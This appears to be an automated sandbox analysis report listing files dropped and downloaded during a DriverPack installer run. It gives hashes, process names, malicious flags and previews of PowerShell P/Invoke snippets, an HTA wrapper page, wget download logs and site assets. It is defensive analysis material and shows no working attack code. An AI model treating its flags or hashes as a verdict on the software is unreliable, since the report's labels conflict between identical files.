      Preview:..$.s.i.g. .=. .'.[.D.l.l.I.m.p.o.r.t.(.".u.s.e.r.3.2...d.l.l.".).]. .p.u.b.l.i.c. .s.t.a.t.i.c. .e.x.t.e.r.n. .i.n.t. .S.e.n.d.M.e.s.s.a.g.e.(.i.n.t. .h.W.n.d.,. .i.n.t. .h.M.s.g.,. .i.n.t. .w.P.a.r.a.m.,. .i.n.t. .l.P.a.r.a.m.).;.[.D.l.l.I.m.p.o.r.t.(.".u.s.e.r.3.2...d.l.l.".).]. .p.u.b.l.i.c. .s.t.a.t.i.c. .e.x.t.e.r.n. .I.n.t.P.t.r. .G.e.t.W.i.n.d.o.w.(.I.n.t.P.t.r. .h.W.n.d.,. .u.i.n.t. .u.C.m.d.).;.[.D.l.l.I.m.p.o.r.t.(.".u.s.e.r.3.2...d.l.l.".,. .E.n.t.r.y.P.o.i.n.t. .=. .".F.i.n.d.W.i.n.d.o.w.E.x.".).]. .p.u.b.l.i.c. .s.t.a.t.i.c. .e.x.t.e.r.n. .I.n.t.P.t.r. .F.i.n.d.W.i.n.d.o.w.E.x.(.I.n.t.P.t.r. .h.w.n.d.P.a.r.e.n.t.,. .I.n.t.P.t.r. .h.w.n.d.C.h.i.l.d.A.f.t.e.r.,. .s.t.r.i.n.g. .l.p.s.z.C.l.a.s.s.,. .s.t.r.i.n.g. .l.p.s.z.W.i.n.d.o.w.).;.'.....A.d.d.-.T.y.p.e. .-.M.e.m.b.e.r.D.e.f.i.n.i.t.i.o.n. .$.s.i.g. .-.n.a.m.e. .N.a.t.i.v.e.M.e.t.h.o.d.s. .-.n.a.m.e.s.p.a.c.e. .W.i.n.3.2.....$.f.i.n.d.H.w.n.d. .=. .[.W.i.n.3.2...N.a.t.i.v.e.M.e.t.h.o.d.s.].:.:.F.i.n.d.W.i.n.d.o.w.E.x.(.
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:C++ source, Unicode text, UTF-16, little-endian text
      Category:dropped
      Size (bytes):7790
      Entropy (8bit):3.4629544502413583
      Encrypted:false
      SSDEEP:
      MD5:B4DED2E77FCBE68B59F99F90C3A80081
      SHA1:232B067374F7B58D4DD3EC5BC0D949153EE08A45
      SHA-256:0FE8C4B4886F5DE8BDAF6E6CCE4A33E77242F08F2F9D42B86D5AA8240CB2D4E6
      SHA-512:F482C67BFF6469B92EA757F20416A1BFD8CF127F1C7751328D9D5C2814CCE5B74881DAE47CE692DAA67917946EC38A9A9BB27667E325AA2075F20ACAC2476E0B
      Malicious:false
      Reputation:low
      Preview:..F.u.n.c.t.i.o.n. .S.e.t.S.c.r.e.e.n.R.e.s.o.l.u.t.i.o.n. .{.....<.#... . ...S.y.n.o.p.s.i.s... . . . .S.e.t.s. .t.h.e. .S.c.r.e.e.n. .R.e.s.o.l.u.t.i.o.n. .o.f. .t.h.e. .p.r.i.m.a.r.y. .m.o.n.i.t.o.r... . ...D.e.s.c.r.i.p.t.i.o.n... . . . .U.s.e.s. .P.i.n.v.o.k.e. .a.n.d. .C.h.a.n.g.e.D.i.s.p.l.a.y.S.e.t.t.i.n.g.s. .W.i.n.3.2.A.P.I. .t.o. .m.a.k.e. .t.h.e. .c.h.a.n.g.e... . ...E.x.a.m.p.l.e... . . . .S.e.t.S.c.r.e.e.n.R.e.s.o.l.u.t.i.o.n. .-.W.i.d.t.h. .1.0.2.4. .-.H.e.i.g.h.t. .7.6.8...#.>.....p.a.r.a.m. .(...[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.,... . .P.o.s.i.t.i.o.n. .=. .0.).]...[.i.n.t.]...$.W.i.d.t.h.,.....[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.,... . .P.o.s.i.t.i.o.n. .=. .1.).]...[.i.n.t.]...$.H.e.i.g.h.t...).....$.p.i.n.v.o.k.e.C.o.d.e. .=. .@.".....u.s.i.n.g. .S.y.s.t.e.m.;...u.s.i.n.g. .S.y.s.t.e.m...R.u.n.t.i.m.e...I.n.t.e.r.o.p.S.e.r.v.i.c.e.s.;.....n.a.m.e.s.p.a.c.e. .R.e.s.o.l.u.t.i.o.n...{... . .[.S.t.r.u.c.t.L.a.y.o.u.t.(.L.a.y.o.u.t.K.i.
      Process:C:\Windows\SysWOW64\cmd.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):9
      Entropy (8bit):2.94770277922009
      Encrypted:false
      SSDEEP:
      MD5:02466847C63E90C5041B8DD7990DCE27
      SHA1:FDCF71F16E2EFCB8815730B4CCA5F580B185CF5C
      SHA-256:195418A93D769A17558AA804568EFF487979E62D0731AA8C63D8D0FFC1723321
      SHA-512:86B11957DB369AFA71831C72848B897AAFD155887467A377484D0346DCAEAAC88476CAD2331E34A24E7F8AC3A07335DD1E639AE27BFA0D4491DCC6A48A7E6FF3
      Malicious:true
      Reputation:low
      Preview:Done 1 ..
      Process:C:\Windows\SysWOW64\cmd.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):9
      Entropy (8bit):2.94770277922009
      Encrypted:false
      SSDEEP:
      MD5:47A22A7A342FD09177C62FCB8054933C
      SHA1:D2B7928A34EEDB04ACC61C3A0E01D3138295E855
      SHA-256:51E6AF14FA1E9032300DBF76A85CB8561E523E89C363CEC09CDC2128801A191D
      SHA-512:B9AB174618FE617B061E27C8F0D4B7960271952A67245C2AD6155E93E0C08CAB696191FBC7069C89F05FF545318F930CBD0DD7DC41B9CCA0E7356143D3B47D98
      Malicious:true
      Reputation:low
      Preview:Done 0 ..
      Process:C:\Windows\SysWOW64\cmd.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):7
      Entropy (8bit):2.8073549220576046
      Encrypted:false
      SSDEEP:
      MD5:D0D964BE87663C957866CC96319A0F2E
      SHA1:5A4AF1923A1AA9FBDF7F92E9AFBC2E47A0297E7F
      SHA-256:9A25234AE91ADA142892F61BB4A52640D8854872909068B7B1C307A8E16591ED
      SHA-512:6F4DED4AECA348CD9234CA0AB1DB569338793C586E086DB06580A1A879C0C62258FCDFC25FE80D7DA376508EDD9F023D07183AB89C70ED8663D338AC4163B1E1
      Malicious:false
      Reputation:low
      Preview:DONE ..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-wget.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):720
      Entropy (8bit):5.244548177091802
      Encrypted:false
      SSDEEP:
      MD5:C13114B780AE35911EF2E53AE34CF713
      SHA1:9DA4F4DD950808D6C1E7BB487EDA1AF9C557EE59
      SHA-256:DDF55657CF74F2979F69B9E88B5BDDF31E56910E1B2744389601FCACCFD6473A
      SHA-512:030FE3343F4B6FD38CC9F3995452B0626ADF071DA16EDDCA7F883D85A9D0660FF00E797B92E05D0CD0EAB2A731380234504B836ADA84557EF90E219B7ADD9512
      Malicious:false
      Reputation:low
      Preview:--2023-08-28 11:34:29-- http://dl.driverpack.io/assistant/beetle/audio/en/START-INITIAL-1.mp3..Resolving dl.driverpack.io... 87.117.231.157, 81.94.192.167, 87.117.239.151, .....Connecting to dl.driverpack.io|87.117.231.157|:80... connected...HTTP request sent, awaiting response... 200 OK..Cookie coming from dl.driverpack.io attempted to set domain to drp.su..Length: 21120 (21K) [audio/mpeg]..Saving to: `C:/Users/user/AppData/Local/Temp/beetle-cab/DriverPack/audio/en/START-INITIAL-1.mp3'.... 0K .......... .......... 100% 928K=0.02s....2023-08-28 11:34:30 (928 KB/s) - `C:/Users/user/AppData/Local/Temp/beetle-cab/DriverPack/audio/en/START-INITIAL-1.mp3' saved [21120/21120]....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-wget.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):717
      Entropy (8bit):5.279503088059108
      Encrypted:false
      SSDEEP:
      MD5:C4B1124FAC73B07EC6105823CAB86371
      SHA1:FDE2E1BDF3AE7CBEFE450E7CB0EB707B5E391305
      SHA-256:1BE26F19B16147BF4EA4DDD5706709CA2B62DBCBE89BEC009E08D6E1E53024D6
      SHA-512:893896BFFE1D53A5E87BE614A9416D0126ADE9488920281B2130A5EFF4CD73DBBE9CC9A8DFB552E2FA41C5C633D842AB2E9D046EA6EA4748DADE8C9836802670
      Malicious:false
      Reputation:low
      Preview:--2023-08-28 11:34:29-- http://dl.driverpack.io/assistant/beetle/audio/en/START-LOADED-1.mp3..Resolving dl.driverpack.io... 87.117.239.150, 87.117.231.157, 81.94.192.167, .....Connecting to dl.driverpack.io|87.117.239.150|:80... connected...HTTP request sent, awaiting response... 200 OK..Cookie coming from dl.driverpack.io attempted to set domain to drp.su..Length: 39265 (38K) [audio/mpeg]..Saving to: `C:/Users/user/AppData/Local/Temp/beetle-cab/DriverPack/audio/en/START-LOADED-1.mp3'.... 0K .......... .......... .......... ........ 100% 650K=0.06s....2023-08-28 11:34:30 (650 KB/s) - `C:/Users/user/AppData/Local/Temp/beetle-cab/DriverPack/audio/en/START-LOADED-1.mp3' saved [39265/39265]....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-wget.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):691
      Entropy (8bit):5.141620695443271
      Encrypted:false
      SSDEEP:
      MD5:1C3FF6E8FFD86A810C65650150FE9254
      SHA1:A235660764ED111F5A20D8DF49B3DAED6FBCDA36
      SHA-256:C0F2368357EC9D4DB57D9F4A1A4695A4FA571A92FF8D81DB20A8955C6BF625FA
      SHA-512:CFB9A9C9C8D1DCE772738EFBA35DEB3930FE0CCB043B4A1449BD0BAAAECF9C0F2C316A74EACE8A3B8D9D1C736E93D78A1680FADE75873BF99D0E1AFF99F35EA3
      Malicious:false
      Reputation:low
      Preview:--2023-08-28 11:34:29-- http://dl.driverpack.io/assistant/beetle/audio/en/intro.mp3..Resolving dl.driverpack.io... 87.117.239.150, 87.117.231.157, 81.94.192.167, .....Connecting to dl.driverpack.io|87.117.239.150|:80... connected...HTTP request sent, awaiting response... 200 OK..Cookie coming from dl.driverpack.io attempted to set domain to drp.su..Length: 27709 (27K) [audio/mpeg]..Saving to: `C:/Users/user/AppData/Local/Temp/beetle-cab/DriverPack/audio/en/intro.mp3'.... 0K .......... .......... ....... 100% 1.08M=0.02s....2023-08-28 11:34:30 (1.08 MB/s) - `C:/Users/user/AppData/Local/Temp/beetle-cab/DriverPack/audio/en/intro.mp3' saved [27709/27709]....
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-wget.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):713
      Entropy (8bit):5.263076487656289
      Encrypted:false
      SSDEEP:
      MD5:9C8053FC8EE0652B5087CEA883FF4498
      SHA1:314346A2E560E083D7E7E3A61B78E06DEF4DFF2C
      SHA-256:F86CF9CCA86B2268B86A5FC451097C4489A91EC8905FC882EB1415FB98A72457
      SHA-512:E9862E41C3D9F965F21302ED0AAA2AC7F84685B5F0CEE3D30A624D4E28DDD00C82C7A54FAEE5816729D31624F5B6CEC45D6C667370744B8FDBAAB713E6210344
      Malicious:false
      Reputation:low
      Preview:--2023-08-28 11:34:29-- http://dl.driverpack.io/assistant/beetle/audio/en/START-SETUP-1.mp3..Resolving dl.driverpack.io... 81.94.192.167, 87.117.231.157, 87.117.239.150, .....Connecting to dl.driverpack.io|81.94.192.167|:80... connected...HTTP request sent, awaiting response... 200 OK..Cookie coming from dl.driverpack.io attempted to set domain to drp.su..Length: 24577 (24K) [audio/mpeg]..Saving to: `C:/Users/user/AppData/Local/Temp/beetle-cab/DriverPack/audio/en/START-SETUP-1.mp3'.... 0K .......... .......... .... 100% 842K=0.03s....2023-08-28 11:34:30 (842 KB/s) - `C:/Users/user/AppData/Local/Temp/beetle-cab/DriverPack/audio/en/START-SETUP-1.mp3' saved [24577/24577]....
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):1672
      Entropy (8bit):5.121271796929296
      Encrypted:false
      SSDEEP:
      MD5:DDA846A4704EFC2A03E1F8392E6F1FFC
      SHA1:387171A06EEE5A76AAEDC3664385BB89703CF6DF
      SHA-256:E9DC9648D8FB7D943431459F49A7D9926197C2D60B3C2B6A58294FD75B672B25
      SHA-512:5CC5AD3FBDF083A87A65BE76869BCA844FAA2D9BE25657B45AD070531892F20D9337739590DD8995BCA03CE23E9CB611129FE2F8457879B6263825D6DF49DA7A
      Malicious:true
      Reputation:low
      Preview:.<!DOCTYPE html>..<html>....<head>.. <title>Starting...</title>.. ->.. <meta http-equiv="X-UA-Compatible" content="IE=7">.. -->.... { IF [NOSCRIPT] } -->.. .. <noscript>.. <meta http-equiv="refresh" content="10;URL='http://'">.. </noscript>.. -->.. <HTA:APPLICATION ID="dwrapper" APPLICATIONNAME="dwrapper" ICON="magnify.exe" WIDTH="700" HEIGHT="600".. CONTEXTMENU="yes" SELECTION="yes" APPLICATION="no" BORDER="none" CAPTION="no" INNERBORDER="no".. MAXIMIZEBUTTON="yes" MINIMIZEBUTTON="yes" NAVIGABLE="yes" SCROLL="no" SCROLLFLAT="no" SHOWINTASKBAR="yes".. SINGLEINSTANCE="no" SYSMENU="yes" VERSION="0.1" WINDOWSTATE="normal" />.... <script type="text/javascript">.. var windowWidth = 700;.. var windowHeight = 600;.. (function () {.. var screenWidth = screen.availWidth;.. var screenHeight = screen.availHeight;.... var newX = (screenWidth - windowWidth) /
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):1672
      Entropy (8bit):5.121271796929296
      Encrypted:false
      SSDEEP:
      MD5:DDA846A4704EFC2A03E1F8392E6F1FFC
      SHA1:387171A06EEE5A76AAEDC3664385BB89703CF6DF
      SHA-256:E9DC9648D8FB7D943431459F49A7D9926197C2D60B3C2B6A58294FD75B672B25
      SHA-512:5CC5AD3FBDF083A87A65BE76869BCA844FAA2D9BE25657B45AD070531892F20D9337739590DD8995BCA03CE23E9CB611129FE2F8457879B6263825D6DF49DA7A
      Malicious:false
      Reputation:low
      Preview:.<!DOCTYPE html>..<html>....<head>.. <title>Starting...</title>.. ->.. <meta http-equiv="X-UA-Compatible" content="IE=7">.. -->.... { IF [NOSCRIPT] } -->.. .. <noscript>.. <meta http-equiv="refresh" content="10;URL='http://'">.. </noscript>.. -->.. <HTA:APPLICATION ID="dwrapper" APPLICATIONNAME="dwrapper" ICON="magnify.exe" WIDTH="700" HEIGHT="600".. CONTEXTMENU="yes" SELECTION="yes" APPLICATION="no" BORDER="none" CAPTION="no" INNERBORDER="no".. MAXIMIZEBUTTON="yes" MINIMIZEBUTTON="yes" NAVIGABLE="yes" SCROLL="no" SCROLLFLAT="no" SHOWINTASKBAR="yes".. SINGLEINSTANCE="no" SYSMENU="yes" VERSION="0.1" WINDOWSTATE="normal" />.... <script type="text/javascript">.. var windowWidth = 700;.. var windowHeight = 600;.. (function () {.. var screenWidth = screen.availWidth;.. var screenHeight = screen.availHeight;.... var newX = (screenWidth - windowWidth) /
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
      Category:dropped
      Size (bytes):1672
      Entropy (8bit):5.121271796929296
      Encrypted:false
      SSDEEP:
      MD5:DDA846A4704EFC2A03E1F8392E6F1FFC
      SHA1:387171A06EEE5A76AAEDC3664385BB89703CF6DF
      SHA-256:E9DC9648D8FB7D943431459F49A7D9926197C2D60B3C2B6A58294FD75B672B25
      SHA-512:5CC5AD3FBDF083A87A65BE76869BCA844FAA2D9BE25657B45AD070531892F20D9337739590DD8995BCA03CE23E9CB611129FE2F8457879B6263825D6DF49DA7A
      Malicious:false
      Reputation:low
      Preview:.<!DOCTYPE html>..<html>....<head>.. <title>Starting...</title>.. ->.. <meta http-equiv="X-UA-Compatible" content="IE=7">.. -->.... { IF [NOSCRIPT] } -->.. .. <noscript>.. <meta http-equiv="refresh" content="10;URL='http://'">.. </noscript>.. -->.. <HTA:APPLICATION ID="dwrapper" APPLICATIONNAME="dwrapper" ICON="magnify.exe" WIDTH="700" HEIGHT="600".. CONTEXTMENU="yes" SELECTION="yes" APPLICATION="no" BORDER="none" CAPTION="no" INNERBORDER="no".. MAXIMIZEBUTTON="yes" MINIMIZEBUTTON="yes" NAVIGABLE="yes" SCROLL="no" SCROLLFLAT="no" SHOWINTASKBAR="yes".. SINGLEINSTANCE="no" SYSMENU="yes" VERSION="0.1" WINDOWSTATE="normal" />.... <script type="text/javascript">.. var windowWidth = 700;.. var windowHeight = 600;.. (function () {.. var screenWidth = screen.availWidth;.. var screenHeight = screen.availHeight;.... var newX = (screenWidth - windowWidth) /
      Process:C:\Windows\SysWOW64\expand.exe
      File Type:CSV text
      Category:dropped
      Size (bytes):145846
      Entropy (8bit):4.379767026957809
      Encrypted:false
      SSDEEP:
      MD5:586F8C2B845BEBFC0D8BF8199B72C859
      SHA1:D53B577BB51DB8C678F337BCFBDE2F2BD3CEDB45
      SHA-256:EA87206731AB11BCC8903498F836FA208E04917154ACD3D2CEC2A58C02F5CB93
      SHA-512:12908D2897BFF03923F03BF3CBF1DDEE0F0BC4F088030983261A3564879787E4DC0AF74A65232E4E393B99832A1521AE60AFF4F558917B5A627FD91B484D221F
      Malicious:false
      Reputation:low
      Preview:.2021-05-27 09:24:25, Info DPX Started DPX phase: Resume and Download Job..2021-05-27 09:24:25, Info DPX Started DPX phase: Apply Deltas Provided In File..2021-05-27 09:24:25, Info DPX Ended DPX phase: Apply Deltas Provided In File..2021-05-27 09:24:25, Info DPX Started DPX phase: Apply Deltas Provided In File..2021-05-27 09:24:26, Info DPX Ended DPX phase: Apply Deltas Provided In File..2021-05-27 09:24:26, Info DPX CJob::Resume completed with status: 0x0..2021-05-27 09:24:26, Info DPX Ended DPX phase: Resume and Download Job..2021-05-27 09:24:26, Info DPX Started DPX phase: Resume and Download Job..2021-05-27 09:24:26, Info DPX Started DPX phase: Apply Deltas Provided In File..2021-05-27 09:24:26, Info DPX Ended DPX phase: Apply Deltas Provided In File..2021-05-27 09:24:26, Info
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1086x384, Scaling: [none]x[none], YUV color, decoders should clamp
      Category:dropped
      Size (bytes):10678
      Entropy (8bit):7.979375466940582
      Encrypted:false
      SSDEEP:
      MD5:5BB0345D8EF892720EBC11A04E69545C
      SHA1:B87953682ABF7BEB8FBD38AEA1470A4440133BE0
      SHA-256:66545F2EEC33E1E7F1343E25029F2549DBB216355962262260ECFE9286AC7108
      SHA-512:8A5CFC3789F5A573177CD123523B7923E47B5827A7662BB90987E9F4E2D08F6F0BB7CC92F607A1676C6F3BEF4E98E1DDEB452BD75B40014D6AA2A68C7DA927C7
      Malicious:false
      Reputation:low
      Preview:RIFF.)..WEBPVP8 .)...I...*>...>.d.R(%)/.2:....gn..h.C.h..t.c....Ho'.`..5|....?.....c.......U...M.A7.|...'^.&.K.&|...../..#K..L..c.......x~..*..H..G.w..I...r...q?#..c..j..H..z.....&;.. H.j........_F..J....$.S.#.7.]I..V..U.s|fqr......t.*.'_,.^eg)..9{r.i...vy#..d.&=M..L....G>@.+....1.........+.w.j....r..~..c.(s....r`.".B.t.,...4..I.^..Y.y...r..B.p.*z.wz.*#a../..Cl..y...S>.3j......=...{.w.y:.9(.}.....p.......a....._7OF..5..*...(.c../.1-.T!.. [.)>Y.....Aw.e...H....Z.w...(Q..q...Z..o..e..M.0....8.g...2..}....uif..,a].3...p:PI.}.......>T...Cv..,O.6.:.....H........t...8>lN1.....5....O}.Rdu6...m.. ..<.GN.b.x.mv.,\..O.w.;.q....a...y.....X..,.Y...|...pG...W.Q..I.p.n....i...3......s...g=_x@./..u.\./..yT..O...9...`..U'...0d ...P8....w..EV..b.......e.8.#4.....k.(..C...1]...F.*.C.x$4~U|R..s<.e.8.......|TV.....Fg~.>D.T.wG.....%}..nX.uW.....b........v...y...4....+....h. ....}I_.8...A.%,.......qb.:FR...*.<.,dX...g...N...m.$..aE..b....`...v...z....'
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (1101), with no line terminators
      Category:downloaded
      Size (bytes):1101
      Entropy (8bit):4.998987995082553
      Encrypted:false
      SSDEEP:
      MD5:1F11796504DF3FB5311722B97CBE2EAD
      SHA1:6D5FBC13354841D508B405C97B3371EC654FC64F
      SHA-256:A83B30758043E6BD347C68563FF3AC0FB31A3332B1C6DC08AA94C26DA8297F63
      SHA-512:1665EB1CD57A1B46F5414F1B85F4C864E748BE52A9E47DFD3DC4F3A9759E798214D774656232FA0F5A8BFCC504AE2011FDAF9B306797A968A37B5AA350BAE3A3
      Malicious:false
      Reputation:low
      URL:https://driverpack.io/style/mobile.css
      Preview:@media(max-width:480px){body{background-color:#fff}.Navbar__search,.header__banner,.NotebookHeader__btn-wrapper,.DropDownLanguage__arrow-icon,.header__wrapper,.NotebookFilters__filter-title{display:none}.Navbar__nav-centered{padding-top:1px}.Navbar__download{line-height:30px}.Navbar__nav{padding-bottom:15px;padding-top:1px}.centered-wrapper{padding-top:0}.block-title{margin:30px 0 10px}.NotebookFilters__filter{padding:0 10px}.DeviceCard__card__wrapper-controls{position:initial}.card__wrapper-controls{float:inherit;display:flex;justify-content:center}.card__title{width:300px}.DeviceCard__download-btn{margin-bottom:5px}.LandingHeaderNav__wrapper div{position:absolute;top:15px;right:0}.LandingHeaderNav__wrapper div a{display:table}.DevicesTypePage__block-subtitle{margin:20px 0 5px}.SeoFooter__title,.SeoFooter__text{word-break:break-word}.Navbar__nav-logo-link{margin-right:100px}.dropdown__label .DropDownOs__label{padding-right:30px}.dropdown__label .DropDownOs__label span:nth-child(2){pad
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (558)
      Category:downloaded
      Size (bytes):221349
      Entropy (8bit):5.542415680839718
      Encrypted:false
      SSDEEP:
      MD5:71F8DD1D81D7B54B2D74C09FDC04B743
      SHA1:FA2ED2F20168B7D425906810C592222BBB6F0F4A
      SHA-256:F0BF71E2AF31BFC660DD78201E7EE6E51ED7E536AC5E7F78E3AC9D387B332855
      SHA-512:11C5C3D2892E5086913D71E98EBB766E7ECE599D9DD4835E08CB92D35CEECED37B072ACCB9293F5D32627444222A6834A3B868475C28041AE5AA21736932AECD
      Malicious:false
      Reputation:low
      URL:https://mc.yandex.ru/metrika/tag.js
      Preview:.(function(){try{(function(){function bf(a,c,b,d){var e=this;return C(window,"c.i",function(){function f(t){(t=cf(k,l,"",t)(k,l))&&(U(t.then)?t.then(g):g(t));return t}function g(t){t&&(U(t)?m.push(t):ra(t)&&y(function(A){var Q=A[0];A=A[1];U(A)&&("u"===Q?m.push(A):h(A,Q))},Ea(t)))}function h(t,A,Q){e[A]=Kl(k,l,Q||p,A,t)}var k=window;(!k||isNaN(a)&&!a)&&Zd();var l=Ll(a,df,c,b,d),m=[],p=[th,cf,uh];p.unshift(Ml);var q=B(P,vb),r=N(l);l.id||Ta(mc("Invalid Metrika id: "+l.id,!0));var u=bd.C("counters",{});if(u[r])return wb(k,.r,"Duplicate counter "+r+" initialization"),u[r];u[r]=e;bd.D("counters",u);bd.Ma("counter",e);y(function(t){t(k,l)},$d);y(f,Ec);f(Nl);h(Ol(k,l,m),"destruct",[th,uh]);Lb(k,F([k,q,f,1,"a.i"],vh));y(f,W)})()}function Pl(a,c){var b;if("https://oauth.yandex.ru"===n(c,"origin")&&n(c,"source.window")&&"_ym_uid_request"===n(c.data,"_ym")){var d=c.source,e=(b={},b._ym_uid=a,b);d.postMessage(e,"https://oauth.yandex.ru")}}function Ql(a){var c=Z(Boolean,B(function(b){var d=b[1];re
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1441x760, components 3
      Category:downloaded
      Size (bytes):91189
      Entropy (8bit):7.972613836440171
      Encrypted:false
      SSDEEP:
      MD5:270B7FED7F9838CF46B29112AEFB3452
      SHA1:4692C870E4D1499EBC8C187C923A3C1F86BAD11F
      SHA-256:5317656E2A0A29F28935100B1262993D8E71A5F06373DB746854AFE2335735F9
      SHA-512:955DE5C9B752842F0A5847EB6B82996E14363D9B1AFBE787FED75028DE89B91FDF6834E278781F2B3CE11E914DA7C4D96FA7786C85E81137CD759B33E6C90439
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/header-bg.jpg
      Preview:......JFIF................................................................"..."*%%*424DD\.................................................."..."*%%*424DD\..........."................................................@L....2D.H.-0..h...@.........."...........$.X..Av.....].='?......&.R......e......fem;t...0.M5URDH...(........../...(U...(......D...C..$....HU.@......... ..ZF.K..0..M5V.....(........l../e.5.^R.B P....V.!...... ....XX.@.Y.`a@...@...t.....]T.Uk. ..............E...O.Q.E.X."_V.....O...~9$..R.b P....@...P.%...u0L.]4.R,..........0(.....f.MK..P.I.B.W.D:.u...;.VA...XX. .A..V... ...'F.v...MUW...........0............(..A1"....$.0...U.8.A$DB..A.(0.....@..0i..Z....b@..................O*B..........e......yB......+....Q.Q@...N.Et.UI...........0....(.F.{.~._8PPP.......A...;..|.@..X.X.F.....U..fW................VP......<.:...AT.@&."@b..H..1~.M.0.~8.DB.Fa.`....@....j.Z.H............+(.0....nvF....EX.T..$.....C.(.n.......e. .Z.c.....(...E.......(....2........1..7..8.D..).D.
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):618
      Entropy (8bit):7.5262238482382235
      Encrypted:false
      SSDEEP:
      MD5:C62EA5AAB1B58919C9DE4C651403D5CB
      SHA1:9C346A9CCC423D0554B11636A400B3B0B23EFE76
      SHA-256:733B544CCDE5BF9105DD5F3464CF9649A5DC4D5238649C6668BFC061026F5AEB
      SHA-512:2FD9537F036757901A97AB3D4921F41A7632765A282BCA69A6DB09EFFC1FCBFC0AA17CFEC0F0E77ED3838334C833F01D84653E0B2997E172860FE8F774C963EF
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/kaspersky-icon.webp
      Preview:RIFFb...WEBPVP8X........L.....ALPH'....'@.m...Lv.GDp..F..Fh....P.....a.......VP8 .........*M...>.Z.K.%"....1...l..e.6.s.i..(..p..... .'...wD]Sz...2..X|...U..R'.(I..+a...m{.>.tt.....!3d2|.?....K...$.\...\.}7..."nG. )O...E.4.?<...3"l._3.....QQ...O.M:4.bI...#...Uw.Y.J..5..Zp...?.,d$Z......p.Zf.Z....*....B.w.{#M.3I..y...k#L.#........6.B"=9..`eG.Io.x.C....c2.F.G....42....Fz.;....._....n...{a....<.W.:...~H2A.\#.Xe.sEll....k...)..M.....!....... ..4.d..[>".=k...b..\....pJ.......K.......g.eM.k..b#..........D\....X,\.k..].(..N.I.....->x.{">.0.{*......G.s.A................jm.&..nR.k|!._="y.b..JM.\...
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:TrueType Font data, 11 tables, 1st "OS/2", 14 names, Macintosh, type 1 string, icomoon-drp
      Category:downloaded
      Size (bytes):9172
      Entropy (8bit):5.980089412129205
      Encrypted:false
      SSDEEP:
      MD5:8B74CE1B9D0265ECF53438C50E14E782
      SHA1:27154CE43D2F79C191146FB6F1E87153343404F0
      SHA-256:849AC8EB080EC41A3AAB3E0A4230D0B9D726C2069AB840A6B75EBA5345BEDAF1
      SHA-512:22BE3228A7366746239D21E6B18ECBC91457D1E02C3779886936F009EFDDC2377B1E6E5E9C2E7B22784327560DF21F1F9D22DCB471988C7CAB4AC62AC66331EC
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/font/icons/icomoon-drp.ttf?io8dtm
      Preview:...........0OS/2...........`cmap.2.........`gasp.......|....glyf.`d........hhead...L.. ....6hhea.S....!$...$hmtxV.....!H...`locaS.K...!....2maxp.-.K..!.... name......!.....post......#.... ...........................3...................................@.........@...@............... .............4...............4...............4...........P............. ................ ......................}................................................... ... .................................................................:...:.......J...J.......j...j.......z...z.......................................................(...(.......*...*..........................79..................79..................79.......i.........O.R........#.26=.4&#"..1...#1#"&51.46313....3...326515041049.&4'150&'1'4&1#1&"#1#".....31.5..4&9.5..51'..#1#4"#1#".....3265158.14638.13...;....#1!"&5154&#"..1...3!265.041049..8.1..38.1!......326717>.54&'1'..#"..8.9....1.!"..8.9..]005................H........a............00...a......
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):7450
      Entropy (8bit):7.964236849232204
      Encrypted:false
      SSDEEP:
      MD5:10B95541817B46F514A81EB5771BBBD7
      SHA1:088B08F2D565B4D36B738106AB607D99D5FC38A1
      SHA-256:2E2C53DA97B923128BE3027D4137F82A06E4C03D64B31B35AE35F76AC514935C
      SHA-512:9C2D5A263BBA8B3F21FE078B6C3CB2DDB22BCAC7851B0354DDFD00F1D595E6E35847042A6611C5D1BA305EB534CF400142DC1901E254EB7F0BCC3FE46CE4AE2B
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/top-video-cards/amd-radeon-rx-6900-xt.webp
